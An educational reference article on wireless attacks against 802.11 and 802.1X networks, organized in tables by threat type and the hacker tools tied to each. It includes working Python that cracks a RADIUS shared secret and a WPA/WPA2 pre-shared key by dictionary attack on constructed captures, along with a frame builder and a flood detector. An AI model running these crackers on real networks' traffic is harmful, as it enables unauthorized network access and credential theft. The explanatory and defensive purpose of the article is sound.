Wireless Security Lunchtime Learning
In our buzzword-filled industry, getting a firm grasp of wireless attacks and their potential business impact can be tough. This tip brings order to that chaos with a reference list of attacks against 802.11 and 802.1X, categorized by type of threat and mapped to the hacker methods and tools associated with each.
Access control attacks
These attacks attempt to penetrate a network over wireless by evading WLAN access control measures, such as AP MAC filters and 802.1X port access controls.
| Type of Attack | Description | Methods and Tools |
|---|---|---|
| War Driving | Discovering wireless LANs by listening for beacons or sending probe requests, providing a launch point for further attacks. | DStumbler, KisMAC, MacStumbler, NetStumbler, WaveStumbler, Wellenreiter |
| Rogue Access Points | Installing an unsecured AP inside the firewall, creating an open backdoor into the trusted network. | Any hardware or software AP |
| Ad Hoc Associations | Connecting directly to an unsecured station to circumvent AP security or to attack the station. | Any wireless card or USB adapter |
| MAC Spoofing | Reconfiguring an attacker's MAC address to pose as an authorized AP or station. | Bwmachak, changemac.sh, SirMACsAlot, SMAC, Wellenreiter, wicontrol |
| 802.1X RADIUS Cracking | Recovering the RADIUS shared secret by offline brute force or dictionary attack against a captured Access-Request (its Message-Authenticator attribute is an HMAC-MD5 keyed with the secret), for use by an evil twin AP. | Packet capture tool on the LAN or network path between AP and RADIUS server |
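The RADIUS cracking entry turns on one detail worth seeing in code: an Access-Request that relays EAP carries a Message-Authenticator attribute (RFC 2869), an HMAC-MD5 keyed with the shared secret over the whole packet, so a single captured request is an offline oracle for guessing that secret. The Python below is an added example, not code from this article or from any tool it lists. The packet it attacks is constructed in the block (assumed user name, NAS address, identifier and a deliberately weak secret) rather than captured; everything else follows the RADIUS wire format.

```python
import hashlib
import hmac
import struct

ACCESS_REQUEST = 1
ATTR_USER_NAME, ATTR_NAS_IP_ADDRESS, ATTR_EAP_MESSAGE, ATTR_MESSAGE_AUTHENTICATOR = 1, 4, 79, 80


def build_attr(attr_type, value):
    """Encode one RADIUS attribute: Type (1) + Length (1, header included) + Value."""
    return struct.pack("!BB", attr_type, len(value) + 2) + value


def build_access_request(secret, identifier, request_authenticator, attrs):
    """Access-Request with a Message-Authenticator (RFC 2869, section 5.14): HMAC-MD5 keyed with the
    shared secret over Code, Identifier, Length, Request Authenticator and all attributes, computed
    with the Message-Authenticator value itself set to sixteen zero octets."""
    body = b"".join(attrs) + build_attr(ATTR_MESSAGE_AUTHENTICATOR, bytes(16))
    header = struct.pack("!BBH", ACCESS_REQUEST, identifier, 20 + len(body)) + request_authenticator
    mac = hmac.new(secret, header + body, hashlib.md5).digest()
    return header + body[:-16] + mac  # replace the zeroed placeholder (last 16 bytes) with the real MAC


def iter_attrs(packet):
    """Yield (offset, type, value) for each attribute after the 20-byte header."""
    pos = 20
    while pos + 2 <= len(packet):
        attr_type, attr_len = packet[pos], packet[pos + 1]
        if attr_len < 2 or pos + attr_len > len(packet):
            raise ValueError("malformed RADIUS attribute")
        yield pos, attr_type, packet[pos + 2:pos + attr_len]
        pos += attr_len


def verify_message_authenticator(secret, packet):
    """Recompute the Message-Authenticator under a candidate secret and compare."""
    for offset, attr_type, value in iter_attrs(packet):
        if attr_type == ATTR_MESSAGE_AUTHENTICATOR and len(value) == 16:
            zeroed = packet[:offset + 2] + bytes(16) + packet[offset + 18:]
            return hmac.compare_digest(hmac.new(secret, zeroed, hashlib.md5).digest(), value)
    return False  # no Message-Authenticator attribute: nothing to check a candidate against here


def crack_shared_secret(packet, wordlist):
    """Offline dictionary attack: one captured Access-Request is its own verification oracle."""
    for candidate in wordlist:
        if verify_message_authenticator(candidate, packet):
            return candidate
    return None


def demo():
    """Constructed capture: an AP relaying EAP-Response/Identity for 'alice' under an assumed weak secret."""
    secret = b"wireless"
    request_authenticator = bytes(range(16))  # fixed instead of random so the demo is reproducible
    attrs = [
        build_attr(ATTR_USER_NAME, b"alice"),
        build_attr(ATTR_NAS_IP_ADDRESS, bytes([192, 168, 1, 2])),
        build_attr(ATTR_EAP_MESSAGE, b"\x02\x01\x00\x0a\x01alice"),  # EAP code 2 (Response), type 1 (Identity)
    ]
    captured = build_access_request(secret, 7, request_authenticator, attrs)
    wordlist = [b"secret", b"radius", b"testing123", b"wireless", b"changeme"]
    return crack_shared_secret(captured, wordlist)


if __name__ == "__main__":
    print("recovered shared secret:", demo())
```

The check is cheap (one MD5-based HMAC per candidate), which is why a long, random shared secret and an encrypted or physically protected path between AP and RADIUS server matter more than the MD5 construction itself.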
Confidentiality attacks
These attacks attempt to intercept private information sent over wireless associations, whether it travels in the clear or is encrypted by 802.11 or higher-layer protocols.
| Type of Attack | Description | Methods and Tools |
|---|---|---|
| Eavesdropping | Capturing and decoding unprotected application traffic to obtain potentially sensitive information. | bsd-airtools, Ethereal (now Wireshark), Ettercap, Kismet, commercial analyzers |
| WEP Key Cracking | Capturing data to recover a WEP key using brute force or Fluhrer-Mantin-Shamir (FMS) cryptanalysis. | Aircrack, AirSnort, chopchop, dwepcrack, WepAttack, WepDecrypt, WepLab |
| Evil Twin AP | Masquerading as an authorized AP by beaconing the WLAN's service set identifier (SSID) to lure users. | cqureAP, HermesAP, HostAP, OpenAP, Quetec, WifiBSD |
| AP Phishing | Running a phony captive portal or Web server on an evil twin AP to "phish" for user logins and credit card numbers. | Airsnarf, Hotspotter |
| Man in the Middle | Running traditional man-in-the-middle attack tools on an evil twin AP to intercept TCP sessions or SSL/SSH tunnels. | dsniff, Ettercap |
Integrity attacks
These attacks send forged control, management or data frames over wireless to mislead the recipient or facilitate another type of attack (e.g., DoS).
| Type of Attack | Description | Methods and Tools |
|---|---|---|
| 802.11 Frame Injection | Crafting and sending forged 802.11 frames. | Airpwn, File2air, libradiate, void11, WEPWedgie, wnet dinject/reinject |
| 802.11 Data Replay | Capturing 802.11 data frames for later (possibly modified) replay. | Capture + Injection Tools |
| 802.11 Data Deletion | Jamming the intended receiver to prevent delivery while simultaneously spoofing ACKs for the deleted data frames. | Jamming + Injection Tools |
| 802.1X EAP Replay | Capturing 802.1X Extensible Authentication Protocol (EAP) messages (e.g., EAP Identity, Success, Failure) for later replay. | Wireless Capture + Injection Tools between station and AP |
| 802.1X RADIUS Replay | Capturing RADIUS Access-Accept or Access-Reject messages for later replay. | Ethernet Capture + Injection Tools between AP and authentication server |
Authentication attacks
Intruders use these attacks to steal legitimate user identities and credentials to access otherwise private networks and services.
| Type of Attack | Description | Methods and Tools |
|---|---|---|
| Shared Key Guessing | Attempting 802.11 Shared Key Authentication with guessed, vendor-default or cracked WEP keys. | WEP Cracking Tools |
| PSK Cracking | Recovering a WPA PSK from captured four-way handshake frames using a dictionary attack tool. | coWPAtty, KisMAC, wpa_crack, wpa-psk-bf |
| Application Login Theft | Capturing user credentials (e.g., e-mail address and password) from cleartext application protocols. | Ace Password Sniffer, Dsniff, PHoss, WinSniffer |
| Domain Login Cracking | Recovering user credentials (e.g., Windows login and password) by cracking captured LM/NTLM challenge-response hashes from SMB/NetBIOS sessions with a brute-force or dictionary attack tool. | John the Ripper, L0phtCrack, Cain |
| VPN Login Cracking | Recovering user credentials (e.g., PPTP password or IPsec Preshared Secret Key) by running brute-force attacks on VPN authentication protocols. | ike_scan and ike_crack (IPsec), anger and THC-pptp-bruter (PPTP) |
| 802.1X Identity Theft | Capturing user identities from cleartext 802.1X EAP-Response/Identity packets. | Capture Tools |
| 802.1X Password Guessing | Using a captured identity, repeatedly attempting 802.1X authentication to guess the user's password. | Password Dictionary |
| 802.1X LEAP Cracking | Recovering user credentials from captured 802.1X Lightweight EAP (LEAP) packets by running a dictionary attack against the MS-CHAP-style challenge/response to recover the NT password hash. | Anwrap, Asleap, THC-LEAPcracker |
| 802.1X EAP Downgrade | Forcing an 802.1X server to offer a weaker type of authentication using forged EAP-Response/Nak packets. | File2air, libradiate |
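The PSK Cracking row above is the one entry in this table where the whole attack can be shown end to end, because everything the attacker needs is in the handshake: SSID, both MAC addresses, both nonces and the Key MIC of message 2. The Python below is an added example, not code from this article or from coWPAtty; it derives PMK and PTK exactly as 802.11i specifies, then runs a dictionary attack in the same style as the tools listed. The handshake it attacks is constructed in the block (assumed SSID, MACs, nonces and passphrase) rather than captured, and it checks the PMK derivation against the passphrase/SSID test vector from the 802.11i standard.

```python
import hashlib
import hmac

MIC_OFFSET = 81  # EAPOL header (4) + descriptor type (1) + key info (2) + key length (2) + replay counter (8)
                 # + nonce (32) + IV (16) + RSC (8) + ID (8) puts the 16-byte Key MIC at byte 81


def derive_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits); this is the slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def check_standard_vector():
    """IEEE 802.11i Annex test vector: passphrase 'password', SSID 'IEEE'."""
    expected = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"
    return derive_pmk(b"password", b"IEEE").hex() == expected


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """IEEE 802.11i PRF-512: PTK from the PMK, both MAC addresses and both handshake nonces."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b""
    for i in range(4):
        ptk += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return ptk[:64]


def eapol_mic(kck, eapol_frame, wpa2):
    """Key MIC over the EAPOL-Key frame (MIC field zeroed). Descriptor version 1 (WPA/TKIP) uses
    HMAC-MD5, version 2 (WPA2/CCMP) uses HMAC-SHA1; both are truncated to 16 bytes."""
    return hmac.new(kck, eapol_frame, hashlib.sha1 if wpa2 else hashlib.md5).digest()[:16]


def build_eapol_key_msg2(snonce, kck, wpa2):
    """Construct message 2/4 (STA -> AP) of the four-way handshake with a valid MIC.
    This is a constructed frame standing in for a capture; the key data field is empty for brevity."""
    key_info = 0x010a if wpa2 else 0x0109  # MIC bit, pairwise bit, descriptor version 2 or 1
    body = (bytes([2 if wpa2 else 254])               # descriptor type: 2 = RSN, 254 = WPA
            + key_info.to_bytes(2, "big")
            + (16 if wpa2 else 32).to_bytes(2, "big")  # key length: CCMP 16, TKIP 32
            + (1).to_bytes(8, "big")                   # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8) # SNonce, key IV, key RSC, key ID
            + bytes(16)                                # MIC placeholder, zero while the MIC is computed
            + (0).to_bytes(2, "big"))                  # key data length
    frame = bytes([1, 3]) + len(body).to_bytes(2, "big") + body  # EAPOL version 1, type 3 (EAPOL-Key)
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame, wpa2) + frame[MIC_OFFSET + 16:]


def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, eapol_frame, wpa2, wordlist):
    """coWPAtty-style dictionary attack: for each candidate, passphrase -> PMK -> PTK, take the KCK
    (first 16 bytes of the PTK) and compare the recomputed Key MIC with the captured one."""
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = eapol_frame[:MIC_OFFSET] + bytes(16) + eapol_frame[MIC_OFFSET + 16:]
    for candidate in wordlist:
        kck = derive_ptk(derive_pmk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed, wpa2), captured_mic):
            return candidate
    return None


def demo(wpa2=True):
    """Constructed handshake parameters (assumed SSID, MACs, nonces, passphrase) and a tiny wordlist."""
    ssid, passphrase = b"corpnet", b"dictionaryword"
    ap_mac, sta_mac = bytes.fromhex("000c4131a2b3"), bytes.fromhex("0013ce12ab34")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    captured = build_eapol_key_msg2(snonce, kck, wpa2)
    wordlist = [b"password", b"12345678", b"corpnet1", b"dictionaryword", b"letmein!"]
    return crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, captured, wpa2, wordlist)


if __name__ == "__main__":
    print("standard vector ok:", check_standard_vector())
    print("recovered WPA2 passphrase:", demo(True))
    print("recovered WPA passphrase:", demo(False))
```

Two things follow directly from the code: the 4096-iteration PBKDF2 is the only cost per guess, so a PSK survives only if it is not in any wordlist, and the salt is the SSID, so a default or common SSID lets an attacker precompute PMKs once and reuse them against every network with that name.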
Availability attacks
These attacks impede delivery of wireless services to legitimate users, either by denying them access to WLAN resources or by crippling those resources.
| Type of Attack | Description | Methods and Tools |
|---|---|---|
| AP Theft | Physically removing an AP from a public space. | "Five finger discount" |
| RF Jamming | Transmitting on the same frequency as the target WLAN, perhaps at a power that exceeds the regulatory limit on Equivalent Isotropically Radiated Power (EIRP). | RF Jammer, Microwave oven, AP with Alchemy/HyperWRT firmware |
| Queensland DoS | Exploiting the CSMA/CA Clear Channel Assessment (CCA) mechanism to make a channel appear busy, so that stations defer transmission indefinitely. | An adapter that supports CW Tx mode, with a low-level utility to invoke continuous transmit |
| 802.11 Beacon Flood | Generating thousands of counterfeit 802.11 beacons to make it hard for stations to find a legitimate AP. | FakeAP |
| 802.11 Associate / Authenticate Flood | Sending forged Authenticate or Associate frames from random MACs to fill a target AP's association table. | Airjack, File2air, Macfld, void11 |
| 802.11 TKIP MIC Exploit | Generating invalid TKIP data to exceed the target AP's MIC error threshold, triggering TKIP countermeasures that suspend WLAN service for 60 seconds. | File2air, wnet dinject |
| 802.11 Deauthenticate Flood | Flooding station(s) with forged Deauthenticate or Disassociate frames to disconnect users from an AP. | Airjack, Omerta, void11 |
| 802.1X EAP-Start Flood | Flooding an AP with EAPOL-Start messages to consume resources or crash the target. | QACafe, File2air, libradiate |
| 802.1X EAP-Failure | Observing a valid 802.1X EAP exchange, and then sending the station a forged EAP-Failure message. | QACafe, File2air, libradiate |
| 802.1X EAP-of-Death | Sending a malformed 802.1X EAP Identity response known to cause some APs to crash. | QACafe, File2air, libradiate |
| 802.1X EAP Length Attacks | Sending EAP type-specific messages with bad length fields to try to crash an AP or RADIUS server. | QACafe, File2air, libradiate |
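The integrity table's frame injection entry and the beacon and deauthenticate flood entries above share one root cause: pre-802.11w management frames carry no authentication, so anyone can serialize a deauthentication or beacon with any addresses. The Python below is an added example, not code from this article or from the tools it lists. It builds those two frame types in memory (it sends nothing) so the reader can see exactly what an injection tool emits, then runs a sliding-window detector over a constructed trace of benign traffic followed by a deauth flood and a beacon flood, the way a wireless IDS sensor would. The MAC addresses, SSIDs, window length and alert thresholds are assumptions, not values from the article.

```python
import struct
from collections import defaultdict, deque

TYPE_MGMT = 0
SUBTYPE_BEACON, SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 0x8, 0xA, 0xC
BROADCAST = b"\xff" * 6


def build_mgmt_frame(subtype, dst, src, bssid, body, seq=0):
    """Serialize one 802.11 management frame: Frame Control (version 0, type 0, subtype in the high
    nibble), Duration, Addr1=DA, Addr2=SA, Addr3=BSSID, Sequence Control, body. No radiotap, no FCS."""
    fc = (subtype << 4) | (TYPE_MGMT << 2)
    return struct.pack("<HH", fc, 0) + dst + src + bssid + struct.pack("<H", seq << 4) + body


def build_deauth(dst, src, bssid, reason=7):
    """Deauthentication body is a 2-byte little-endian reason code (7 = class 3 frame from non-associated STA)."""
    return build_mgmt_frame(SUBTYPE_DEAUTH, dst, src, bssid, struct.pack("<H", reason))


def build_beacon(bssid, ssid, interval=100):
    """Beacon body: timestamp (8), beacon interval (2), capability (2), then information elements;
    only the SSID element (tag 0) is included here."""
    body = struct.pack("<QHH", 0, interval, 0x0401) + bytes([0, len(ssid)]) + ssid
    return build_mgmt_frame(SUBTYPE_BEACON, BROADCAST, bssid, bssid, body)


def parse_frame(raw):
    """Return header fields plus reason code (deauth/disassoc) or SSID (beacon); None if not management."""
    if len(raw) < 24:
        return None
    fc = struct.unpack_from("<H", raw, 0)[0]
    if (fc >> 2) & 0x3 != TYPE_MGMT:
        return None
    frame = {"subtype": (fc >> 4) & 0xF, "dst": raw[4:10], "src": raw[10:16], "bssid": raw[16:22]}
    body = raw[24:]
    if frame["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and len(body) >= 2:
        frame["reason"] = struct.unpack_from("<H", body, 0)[0]
    elif frame["subtype"] == SUBTYPE_BEACON:
        pos = 12  # skip the fixed fields, then walk tag/length/value elements
        while pos + 2 <= len(body):
            tag, length = body[pos], body[pos + 1]
            if tag == 0:
                frame["ssid"] = body[pos + 2:pos + 2 + length]
                break
            pos += 2 + length
    return frame


class FloodDetector:
    """Sliding-window detector. Alerts once per burst when one source address sends more than
    deauth_limit deauth/disassoc frames, or when more than bssid_limit distinct BSSIDs beacon,
    inside window_s seconds. Thresholds are assumptions to be tuned per site."""

    def __init__(self, window_s=10.0, deauth_limit=20, bssid_limit=50):
        self.window_s, self.deauth_limit, self.bssid_limit = window_s, deauth_limit, bssid_limit
        self.deauths = defaultdict(deque)  # source MAC -> timestamps of its deauth/disassoc frames
        self.beacons = deque()             # (timestamp, bssid) for every beacon seen
        self.beacon_alerted = False
        self.alerts = []

    def observe(self, ts, raw):
        frame = parse_frame(raw)
        if frame is None:
            return
        if frame["subtype"] in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            dq = self.deauths[frame["src"]]
            dq.append(ts)
            while dq and ts - dq[0] > self.window_s:
                dq.popleft()
            if len(dq) == self.deauth_limit + 1:  # fires exactly once, when the threshold is crossed
                self.alerts.append(("deauth_flood", frame["src"].hex(":")))
        elif frame["subtype"] == SUBTYPE_BEACON:
            self.beacons.append((ts, frame["bssid"]))
            while self.beacons and ts - self.beacons[0][0] > self.window_s:
                self.beacons.popleft()
            distinct = len({bssid for _, bssid in self.beacons})
            if distinct > self.bssid_limit and not self.beacon_alerted:
                self.beacon_alerted = True
                self.alerts.append(("beacon_flood", distinct))
            elif distinct <= self.bssid_limit:
                self.beacon_alerted = False


def demo():
    """Constructed trace: benign beacons and one legitimate deauth, then a deauth flood and a beacon flood."""
    ap, sta = bytes.fromhex("000c4131a2b3"), bytes.fromhex("0013ce12ab34")
    det, t = FloodDetector(), 0.0
    for _ in range(30):                                   # the real AP beacons every 100 ms
        det.observe(t, build_beacon(ap, b"corpnet"))
        t += 0.1
    det.observe(t, build_deauth(sta, ap, ap, reason=2))   # the AP drops one stale client
    benign_alerts = len(det.alerts)
    for _ in range(60):                                   # deauth flood: forged source = AP, broadcast DA
        det.observe(t, build_deauth(BROADCAST, ap, ap))
        t += 0.01
    for i in range(200):                                  # beacon flood: 200 fake BSSIDs, 200 SSIDs
        det.observe(t, build_beacon(bytes([0x02, 0, 0, 0, i >> 8, i & 0xFF]), b"net%03d" % i))
        t += 0.01
    return benign_alerts, det.alerts


if __name__ == "__main__":
    print(demo())
```

The detector keys deauthentication counts on the source address precisely because the flood in the trace forges the AP's own address; a real sensor would also compare sequence numbers and signal strength against the genuine AP to tell the two apart.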
Note: Many of these tools can be found in the Auditor Security Collection, a KNOPPIX-based toolkit intended for use during penetration testing and vulnerability assessment (Auditor was later merged into BackTrack, the predecessor of Kali Linux).
This was first published in April 2006